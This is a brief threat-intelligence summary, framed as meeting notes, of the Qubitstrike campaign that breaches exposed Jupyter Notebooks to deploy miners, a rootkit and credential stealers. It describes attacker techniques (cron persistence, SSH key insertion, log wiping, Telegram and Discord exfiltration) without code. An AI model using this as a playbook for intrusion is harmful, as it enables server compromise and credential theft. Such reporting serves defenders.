October 18, 2023 at 08:02AM
Hackers are targeting internet-exposed Jupyter Notebooks to breach servers and deploy malware, including a Linux rootkit, crypto miners, and password-stealing scripts. This new campaign, called ‘Qubitstrike,’ aims to hijack Linux servers for cryptomining and steal credentials for cloud services. The malware is hosted on codeberg.org, marking the first instance of this platform being used for distributing malware. The attackers scan for exposed Jupyter Notebooks, steal credentials, and perform various malicious activities on compromised servers using scripts. Qubitstrike also uses the open-source Diamorphine rootkit to hide running scripts and malware payloads.
Meeting Summary:
– Hackers are targeting internet-exposed Jupyter Notebooks to breach servers and deploy malware.
– The malware, called ‘PyLoose’ and ‘Qubitstrike,’ consists of a Linux rootkit, crypto miners, and password-stealing scripts.
– Qubitstrike is a new campaign that hijacks Linux servers for cryptomining and credential theft.
– The Qubitstrike malware payloads are hosted on codeberg.org for the first time.
– The attack begins with scanning for exposed Jupyter Notebooks, followed by CPU identification for mining potential.
– Attackers download and execute a script called ‘mi.sh’ to carry out malicious activities.
– The script downloads and runs an XMRig miner, sets up cron jobs for persistence, inserts an SSH key for root access, installs the ‘Diamorphine’ rootkit, and steals credentials.
– Qubitstrike uses an additional component called “kthreadd” for attack optimization.
– Transfer utilities like ‘curl’ and ‘wget’ are renamed, and log files are wiped to cover the attacker’s traces.
– The Diamorphine rootkit is used to hide the presence of scripts and malware payloads.
– Qubitstrike searches for credentials in specific directories and sends them back to the attackers using the Telegram Bot API.
– The attacker’s profile on Telegram shows an IP address from Tunisia and the use of Kali Linux.
– Discord is used for command and control operations and data exfiltration.
– The attacker’s Discord nickname is ‘BlackSUN’, server named ‘NETShadow,’ and channels named ‘victims’ and ‘ssh’.
Please let me know if you need more information or have any specific questions about the meeting notes.